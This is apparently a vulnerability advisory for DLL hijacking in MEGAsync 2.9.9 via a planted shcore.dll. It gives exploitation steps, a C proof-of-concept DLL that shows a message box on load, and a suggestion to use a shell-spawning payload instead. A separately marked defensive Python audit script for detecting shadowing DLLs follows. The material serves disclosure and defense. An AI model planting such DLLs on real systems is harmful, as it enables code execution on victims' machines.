MEGAsync 2.9.9 DLL Hijacking

2016.08.30
Credit: Amir.ght
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: MEGAsync DLL Hijacking Exploit (shcore.dll)
# Date: 27-8-2016
# Author: Amir.ght
# Vendor Homepage: https://mega.nz
# Software Link: https://mega.nz/MEGAsyncSetup.exe
# Version: 2.9.9
# Tested on: Windows 7
----------------------------------------------------------------------------------------------------------
Vuln DLL: shcore.dll

MEGAsync.exe will search for and load any DLL named "shcore.dll".
If an attacker can place the DLL in a location where the victim opens MEGAsync.exe,
it will load and run the attacker's DLL and code.
A msfpayload DLL could also be generated to spawn a shell, for example.
----------------------------------------------------------------------------------------------------------
# Exploit:
1- Save and compile the C code below as 'shcore.dll' to create the vuln DLL
2- Place 'shcore.dll' in the same directory as MEGAsync
3- Open MEGAsync.exe

:DLL
//gcc test.c -o shcore.dll -shared
//this DLL shows a message box
#include <windows.h>
#define DllExport __declspec (dllexport)

// Defined before DllMain so the call below has a visible declaration.
int dll_hijack()
{
    MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
    return 0;
}

// Entry point the loader calls when the DLL is mapped into MEGAsync.exe.
BOOL WINAPI DllMain (
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    dll_hijack();
    return 0;
}
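A defensive audit for the condition described above, as an added example that is not part of the original advisory: it lists DLLs in an application directory whose names also exist in the system directory (as shcore.dll does here) and reports whether the bytes differ. The function names, directory layout and file contents in `demo()` are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Hex SHA-256 of a file's contents."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def find_shadowing_dlls(app_dir, system_dir):
    """Report DLLs in app_dir that share a name with a DLL in system_dir.

    Under the default Windows search order the directory the executable was
    loaded from is searched before the system directory, so a same-named
    file next to the .exe is loaded in place of the system copy.
    Names are compared case-insensitively, as Windows does.
    """
    system = {p.name.lower(): p for p in Path(system_dir).iterdir()
              if p.suffix.lower() == ".dll"}
    findings = []
    for p in sorted(Path(app_dir).iterdir()):
        match = system.get(p.name.lower())
        if p.suffix.lower() != ".dll" or match is None:
            continue
        findings.append({
            "name": p.name,
            "path": str(p),
            # False means the local file is not a copy of the system DLL.
            "same_as_system": sha256_of(p) == sha256_of(match),
        })
    return findings


def demo():
    """Audit a constructed layout: one planted DLL, one ordinary vendor DLL."""
    with tempfile.TemporaryDirectory() as root:
        app, sysdir = Path(root, "MEGAsync"), Path(root, "System32")
        app.mkdir()
        sysdir.mkdir()
        (sysdir / "shcore.dll").write_bytes(b"constructed system copy")
        (sysdir / "version.dll").write_bytes(b"constructed system copy 2")
        (app / "MEGAsync.exe").write_bytes(b"constructed executable")
        (app / "SHCORE.DLL").write_bytes(b"constructed planted copy")
        (app / "vendor.dll").write_bytes(b"constructed vendor library")
        return find_shadowing_dlls(app, sysdir)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host, pass the application's install directory and `C:\Windows\System32`; a finding with `same_as_system` set to False is the case to investigate first.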

